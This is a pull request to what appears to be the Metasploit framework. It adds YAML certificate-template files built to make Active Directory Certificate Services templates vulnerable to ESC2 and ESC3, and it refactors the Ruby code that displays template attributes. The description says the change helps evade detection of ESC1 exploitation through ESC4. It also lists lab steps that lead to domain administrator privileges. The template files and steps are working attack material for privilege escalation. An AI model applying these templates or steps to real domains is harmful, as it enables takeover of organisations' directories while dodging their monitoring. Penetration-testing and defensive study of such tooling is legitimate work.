### PR TITLE
Add template data files for ESC2 and ESC3

### DIFF
--- a/data/auxiliary/admin/ldap/ad_cs_cert_template/esc2_template.yaml
+++ b/data/auxiliary/admin/ldap/ad_cs_cert_template/esc2_template.yaml
@@ -1,6 +1,6 @@
 ---
-# Creates a template that will be vulnerable to ESC1 (subject name supplied in
-# the request). Fields are based on the SubCA template. For field descriptions,
+# Creates a template that will be vulnerable to ESC2 (any purpose EKU).
+# Fields are based on the SubCA template. For field descriptions,
 # see: https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-crtd/b2df0c1c-8657-4684-bb5f-4f6b89c8d434
 showInAdvancedViewOnly: 'TRUE'
 # this security descriptor grants all permissions to all authenticated users
@@ -9,10 +9,13 @@ flags: 0
 pKIDefaultKeySpec: 2
 pKIKeyUsage: !binary |-
   hgA=
-pKIMaxIssuingDepth: -1
+pKIMaxIssuingDepth: 0
 pKICriticalExtensions:
 - 2.5.29.19
 - 2.5.29.15
+pKIExtendedKeyUsage:
+# Any Purpose OID
+- 2.5.29.37.0
 pKIExpirationPeriod: !binary |-
   AEAepOhl+v8=
 pKIOverlapPeriod: !binary |-
@@ -22,6 +25,6 @@ msPKI-RA-Signature: 0
 msPKI-Enrollment-Flag: 0
 # CT_FLAG_EXPORTABLE_KEY
 msPKI-Private-Key-Flag: 0x10
-# CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
-msPKI-Certificate-Name-Flag: 1
+# CT_FLAG_SUBJECT_ALT_REQUIRE_UPN | CT_FLAG_SUBJECT_REQUIRE_DIRECTORY_PATH
+msPKI-Certificate-Name-Flag: 0x82000000
 msPKI-Minimal-Key-Size: 2048

--- a/data/auxiliary/admin/ldap/ad_cs_cert_template/esc3_template.yaml
+++ b/data/auxiliary/admin/ldap/ad_cs_cert_template/esc3_template.yaml
@@ -1,6 +1,6 @@
 ---
-# Creates a template that will be vulnerable to ESC1 (subject name supplied in
-# the request). Fields are based on the SubCA template. For field descriptions,
+# Creates a template that will be vulnerable to ESC3 (certificate request agent EKU).
+# Fields are based on the SubCA template. For field descriptions,
 # see: https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-crtd/b2df0c1c-8657-4684-bb5f-4f6b89c8d434
 showInAdvancedViewOnly: 'TRUE'
 # this security descriptor grants all permissions to all authenticated users
@@ -9,10 +9,13 @@ flags: 0
 pKIDefaultKeySpec: 2
 pKIKeyUsage: !binary |-
   hgA=
-pKIMaxIssuingDepth: -1
+pKIMaxIssuingDepth: 0
 pKICriticalExtensions:
 - 2.5.29.19
 - 2.5.29.15
+pKIExtendedKeyUsage:
+# Certificate Request Agent OID
+- 1.3.6.1.4.1.311.20.2.1
 pKIExpirationPeriod: !binary |-
   AEAepOhl+v8=
 pKIOverlapPeriod: !binary |-
@@ -22,6 +25,6 @@ msPKI-RA-Signature: 0
 msPKI-Enrollment-Flag: 0
 # CT_FLAG_EXPORTABLE_KEY
 msPKI-Private-Key-Flag: 0x10
-# CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
-msPKI-Certificate-Name-Flag: 1
+# CT_FLAG_SUBJECT_ALT_REQUIRE_UPN | CT_FLAG_SUBJECT_REQUIRE_DIRECTORY_PATH
+msPKI-Certificate-Name-Flag: 0x82000000
 msPKI-Minimal-Key-Size: 2048

--- a/documentation/modules/auxiliary/admin/dcerpc/icpr_cert.md
+++ b/documentation/modules/auxiliary/admin/dcerpc/icpr_cert.md
@@ -3,6 +3,8 @@ Request certificates via MS-ICPR (Active Directory Certificate Services). Depend
 template's configuration the resulting certificate can be used for various operations such as authentication.
 PFX certificate files that are saved are encrypted with a blank password.
 
+This module is capable of exploiting ESC1, ESC2, ESC3 and ESC13.
+
 ## Module usage 
 
 1. From msfconsole

--- a/documentation/modules/auxiliary/admin/ldap/ad_cs_cert_template.md
+++ b/documentation/modules/auxiliary/admin/ldap/ad_cs_cert_template.md
@@ -1,9 +1,13 @@
-## RBCD Exploitation
+## AD CS Certificate Template Exploitation
 
 This module can read, write, update, and delete AD CS certificate templates from a Active Directory Domain Controller.
 
-The READ, UPDATE, and DELETE actions will write a copy of the certificate template to disk that can be restored using
-the CREATE or UPDATE actions.
+The READ, UPDATE, and DELETE actions will write a copy of the certificate template to disk that can be
+restored using the CREATE or UPDATE actions. The CREATE and UPDATE actions require a certificate template data
+file to be specified to define the attributes. Template data files are provided to create a template that is
+vulnerable to ESC1, ESC2, and ESC3.
+
+This module is capable of exploiting ESC4.
 
 In order for the `auxiliary/admin/ldap/ad_cs_cert_template` module to succeed, the authenticated user must have the 
 necessary permissions to perform the specified action on the target object (the certificate specified in

--- a/modules/auxiliary/admin/dcerpc/icpr_cert.rb
+++ b/modules/auxiliary/admin/dcerpc/icpr_cert.rb
@@ -20,6 +20,8 @@ class MetasploitModule < Msf::Auxiliary
           Request certificates via MS-ICPR (Active Directory Certificate Services). Depending on the certificate
           template's configuration the resulting certificate can be used for various operations such as authentication.
           PFX certificate files that are saved are encrypted with a blank password.
+
+          This module is capable of exploiting ESC1, ESC2, ESC3 and ESC13.
         },
         'License' => MSF_LICENSE,
         'Author' => [

--- a/modules/auxiliary/admin/ldap/ad_cs_cert_template.rb
+++ b/modules/auxiliary/admin/ldap/ad_cs_cert_template.rb
@@ -333,10 +333,10 @@ class MetasploitModule < Msf::Auxiliary
       print_status("  objectGUID:        #{object_guid}")
     end
 
-    mspki_flag = obj['mspki-certificate-name-flag']&.first
-    if mspki_flag.present?
-      mspki_flag = [obj['mspki-certificate-name-flag'].first.to_i].pack('l').unpack1('L')
-      print_status("  msPKI-Certificate-Name-Flag: 0x#{mspki_flag.to_s(16).rjust(8, '0')}")
+    pki_flag = obj['mspki-certificate-name-flag']&.first
+    if pki_flag.present?
+      pki_flag = [obj['mspki-certificate-name-flag'].first.to_i].pack('l').unpack1('L')
+      print_status("  msPKI-Certificate-Name-Flag: 0x#{pki_flag.to_s(16).rjust(8, '0')}")
       %w[
         CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
         CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT_ALT_NAME
@@ -352,16 +352,16 @@ class MetasploitModule < Msf::Auxiliary
         CT_FLAG_SUBJECT_REQUIRE_DIRECTORY_PATH
         CT_FLAG_OLD_CERT_SUPPLIES_SUBJECT_AND_ALT_NAME
       ].each do |flag_name|
-        if mspki_flag & Rex::Proto::MsCrtd.const_get(flag_name) != 0
+        if pki_flag & Rex::Proto::MsCrtd.const_get(flag_name) != 0
           print_status("    * #{flag_name}")
         end
       end
     end
 
-    mspki_flag = obj['mspki-enrollment-flag']&.first
-    if mspki_flag.present?
-      mspki_flag = [obj['mspki-enrollment-flag'].first.to_i].pack('l').unpack1('L')
-      print_status("  msPKI-Enrollment-Flag: 0x#{mspki_flag.to_s(16).rjust(8, '0')}")
+    pki_flag = obj['mspki-enrollment-flag']&.first
+    if pki_flag.present?
+      pki_flag = [obj['mspki-enrollment-flag'].first.to_i].pack('l').unpack1('L')
+      print_status("  msPKI-Enrollment-Flag: 0x#{pki_flag.to_s(16).rjust(8, '0')}")
       %w[
         CT_FLAG_INCLUDE_SYMMETRIC_ALGORITHMS
         CT_FLAG_PEND_ALL_REQUESTS
@@ -381,16 +381,16 @@ class MetasploitModule < Msf::Auxiliary
         CT_FLAG_ISSUANCE_POLICIES_FROM_REQUEST
         CT_FLAG_SKIP_AUTO_RENEWAL
       ].each do |flag_name|
-        if mspki_flag & Rex::Proto::MsCrtd.const_get(flag_name) != 0
+        if pki_flag & Rex::Proto::MsCrtd.const_get(flag_name) != 0
           print_status("    * #{flag_name}")
         end
       end
     end
 
-    mspki_flag = obj['mspki-private-key-flag']&.first
-    if mspki_flag.present?
-      mspki_flag = [obj['mspki-private-key-flag'].first.to_i].pack('l').unpack1('L')
-      print_status("  msPKI-Private-Key-Flag: 0x#{mspki_flag.to_s(16).rjust(8, '0')}")
+    pki_flag = obj['mspki-private-key-flag']&.first
+    if pki_flag.present?
+      pki_flag = [obj['mspki-private-key-flag'].first.to_i].pack('l').unpack1('L')
+      print_status("  msPKI-Private-Key-Flag: 0x#{pki_flag.to_s(16).rjust(8, '0')}")
       %w[
         CT_FLAG_REQUIRE_PRIVATE_KEY_ARCHIVAL
         CT_FLAG_EXPORTABLE_KEY
@@ -407,27 +407,16 @@ class MetasploitModule < Msf::Auxiliary
         CT_FLAG_EK_VALIDATE_KEY
         CT_FLAG_HELLO_LOGON_KEY
       ].each do |flag_name|
-        if mspki_flag & Rex::Proto::MsCrtd.const_get(flag_name) != 0
+        if pki_flag & Rex::Proto::MsCrtd.const_get(flag_name) != 0
           print_status("    * #{flag_name}")
         end
       end
     end
 
-    mspki_flag = obj['mspki-ra-signature']&.first
-    if mspki_flag.present?
-      mspki_flag = [obj['mspki-ra-signature'].first.to_i].pack('l').unpack1('L')
-      print_status("  msPKI-RA-Signature: 0x#{mspki_flag.to_s(16).rjust(8, '0')}")
-    end
-
-    if obj['pkiextendedkeyusage'].present?
-      print_status('  pKIExtendedKeyUsage:')
-      obj['pkiextendedkeyusage'].each do |value|
-        if (oid = Rex::Proto::CryptoAsn1::OIDs.value(value)) && oid.label.present?
-          print_status("    * #{value} (#{oid.label})")
-        else
-          print_status("    * #{value}")
-        end
-      end
+    pki_flag = obj['mspki-ra-signature']&.first
+    if pki_flag.present?
+      pki_flag = [pki_flag.to_i].pack('l').unpack1('L')
+      print_status("  msPKI-RA-Signature: 0x#{pki_flag.to_s(16).rjust(8, '0')}")
     end
 
     if obj['mspki-certificate-policy'].present?
@@ -447,6 +436,31 @@ class MetasploitModule < Msf::Auxiliary
           end
         end
       end
+    end
+
+    if obj['mspki-template-schema-version'].present?
+      print_status("  msPKI-Template-Schema-Version: #{obj['mspki-template-schema-version'].first.to_i}")
+    end
+
+    pki_flag = obj['pkikeyusage']&.first
+    if pki_flag.present?
+      pki_flag = [pki_flag.to_i].pack('l').unpack1('L')
+      print_status("  pKIKeyUsage: 0x#{pki_flag.to_s(16).rjust(8, '0')}")
+    end
+
+    if obj['pkiextendedkeyusage'].present?
+      print_status('  pKIExtendedKeyUsage:')
+      obj['pkiextendedkeyusage'].each do |value|
+        if (oid = Rex::Proto::CryptoAsn1::OIDs.value(value)) && oid.label.present?
+          print_status("    * #{value} (#{oid.label})")
+        else
+          print_status("    * #{value}")
+        end
+      end
+    end
+
+    if obj['pkimaxissuingdepth'].present?
+      print_status("  pKIMaxIssuingDepth: #{obj['pkimaxissuingdepth'].first.to_i}")
     end
   end
 

--- a/modules/auxiliary/admin/ldap/ad_cs_cert_template.rb
+++ b/modules/auxiliary/admin/ldap/ad_cs_cert_template.rb
@@ -42,11 +42,15 @@ class MetasploitModule < Msf::Auxiliary
         info,
         'Name' => 'AD CS Certificate Template Management',
         'Description' => %q{
-          This module can read, write, update, and delete AD CS certificate templates from a Active Directory Domain
+          This module can create, read, update, and delete AD CS certificate templates from a Active Directory Domain
           Controller.
 
           The READ, UPDATE, and DELETE actions will write a copy of the certificate template to disk that can be
-          restored using the CREATE or UPDATE actions.
+          restored using the CREATE or UPDATE actions. The CREATE and UPDATE actions require a certificate template data
+          file to be specified to define the attributes. Template data files are provided to create a template that is
+          vulnerable to ESC1, ESC2, and ESC3.
+
+          This module is capable of exploiting ESC4.
         },
         'Author' => [
           'Will Schroeder', # original idea/research
@@ -69,7 +73,8 @@ class MetasploitModule < Msf::Auxiliary
         'Notes' => {
           'Stability' => [],
           'SideEffects' => [CONFIG_CHANGES],
-          'Reliability' => []
+          'Reliability' => [],
+          'AKA' => [ 'Certifry', 'Certipy' ]
         }
       )
     )

--- a/modules/auxiliary/admin/ldap/ad_cs_cert_template.rb
+++ b/modules/auxiliary/admin/ldap/ad_cs_cert_template.rb
@@ -327,13 +327,13 @@ class MetasploitModule < Msf::Auxiliary
 
     print_status('Certificate Template:')
     print_status("  distinguishedName: #{obj['distinguishedname'].first}")
-    print_status("  displayName:       #{obj['displayname'].first}") if obj['displayname'].first.present?
+    print_status("  displayName:       #{obj['displayname'].first}") if obj['displayname'].present?
     if obj['objectguid'].first.present?
       object_guid = Rex::Proto::MsDtyp::MsDtypGuid.read(obj['objectguid'].first)
       print_status("  objectGUID:        #{object_guid}")
     end
 
-    mspki_flag = obj['mspki-certificate-name-flag'].first
+    mspki_flag = obj['mspki-certificate-name-flag']&.first
     if mspki_flag.present?
       mspki_flag = [obj['mspki-certificate-name-flag'].first.to_i].pack('l').unpack1('L')
       print_status("  msPKI-Certificate-Name-Flag: 0x#{mspki_flag.to_s(16).rjust(8, '0')}")
@@ -358,7 +358,7 @@ class MetasploitModule < Msf::Auxiliary
       end
     end
 
-    mspki_flag = obj['mspki-enrollment-flag'].first
+    mspki_flag = obj['mspki-enrollment-flag']&.first
     if mspki_flag.present?
       mspki_flag = [obj['mspki-enrollment-flag'].first.to_i].pack('l').unpack1('L')
       print_status("  msPKI-Enrollment-Flag: 0x#{mspki_flag.to_s(16).rjust(8, '0')}")
@@ -387,7 +387,7 @@ class MetasploitModule < Msf::Auxiliary
       end
     end
 
-    mspki_flag = obj['mspki-private-key-flag'].first
+    mspki_flag = obj['mspki-private-key-flag']&.first
     if mspki_flag.present?
       mspki_flag = [obj['mspki-private-key-flag'].first.to_i].pack('l').unpack1('L')
       print_status("  msPKI-Private-Key-Flag: 0x#{mspki_flag.to_s(16).rjust(8, '0')}")
@@ -413,7 +413,7 @@ class MetasploitModule < Msf::Auxiliary
       end
     end
 
-    mspki_flag = obj['mspki-ra-signature'].first
+    mspki_flag = obj['mspki-ra-signature']&.first
     if mspki_flag.present?
       mspki_flag = [obj['mspki-ra-signature'].first.to_i].pack('l').unpack1('L')
       print_status("  msPKI-RA-Signature: 0x#{mspki_flag.to_s(16).rjust(8, '0')}")

--- a/modules/auxiliary/gather/ldap_esc_vulnerable_cert_finder.rb
+++ b/modules/auxiliary/gather/ldap_esc_vulnerable_cert_finder.rb
@@ -44,7 +44,8 @@ class MetasploitModule < Msf::Auxiliary
         'Notes' => {
           'Stability' => [CRASH_SAFE],
           'SideEffects' => [IOC_IN_LOGS],
-          'Reliability' => []
+          'Reliability' => [],
+          'AKA' => [ 'Certifry', 'Certipy' ]
         }
       )
     )


### PR DESCRIPTION
This adds template data files to make certificates vulnerable to ESC2 and ESC3 by adjusting the EKUs. This was requested as a means to evade detection of ESC1 exploitation in combination with ESC4. Now ESC4 (insecure object permissions) can be leveraged to make a certificate vulnerable to either ESC2 or ESC3 instead of just ESC1.

While building the template data files, I ran into some issues so I added additional fields to the output of `ad_cs_cert_template` to aid in debugging the issues by comparing different templates. Also fixed a bug that would occur when reading a template if a field was missing.

## Testing

- [x]  [Install AD CS](https://docs.metasploit.com/docs/pentesting/active-directory/ad-certificates/overview.html#installing-ad-cs)
- [x]  To create a target for ESC4:
    - [x]  Run `certtmpl.msc` to start the Certificate Template console
    - [x]  Right click the "User" template and select "Duplicate Template" (should be able to use any template but this one worked in testing)
    - [x]  Set the name to something memorable in the "General" tab, `ESC4-Test` works well and is used in some docs already
    - [x]  In the "Security" tab, either grant a specific user Read and Write permissions, or update the existing "Authenticated Users" entry to also have Write permissions
    - [x] Run `certsrv.msc` to start the Certificate Authority console
    - [x] Select the domain and then "Certificate Templates"
    - [x] Right click and select New > Certificate Template to Issue,
    - [x] Select `ESC4-Test` (or whatever the template was named in the previous step) and press OK to enable the template for enrollment
- [x]  Follow the steps in the new [Exploiting ESC4 To Gain Domain Adminsitator Privileges](https://github.com/rapid7/metasploit-framework/blob/1c48afd036640c4290b016f2e0afca2ec8f6c73a/docs/metasploit-framework.wiki/ad-certificates/Attacking-AD-CS-ESC-Vulnerabilities.md#exploiting-esc4-to-gain-domain-administrator-privileges) section of the docs.
    - [x] When updating the template data, set `TEMPLATE_FILE` to one of the new templates for either ESC2 or ESC3
    - [x] Once the template has bee updated, follow the exploit steps for either [ESC2](https://docs.metasploit.com/docs/pentesting/active-directory/ad-certificates/attacking-ad-cs-esc-vulnerabilities.html#exploiting-esc2-to-gain-domain-administrator-privileges) or [ESC3](https://docs.metasploit.com/docs/pentesting/active-directory/ad-certificates/attacking-ad-cs-esc-vulnerabilities.html#exploiting-esc3-to-gain-domain-administrator-privileges) (Note that while the underlying misconfigurations are different, the actual commands to leverage them are the same).
    - [x] Once the certificate has been issued, please also test some of the actions in the new [Authenticating With A Certificate](https://github.com/rapid7/metasploit-framework/blob/1c48afd036640c4290b016f2e0afca2ec8f6c73a/docs/metasploit-framework.wiki/ad-certificates/Attacking-AD-CS-ESC-Vulnerabilities.md#authenticating-with-a-certificate) section to both confirm the cert is functional and that the new docs make sense.

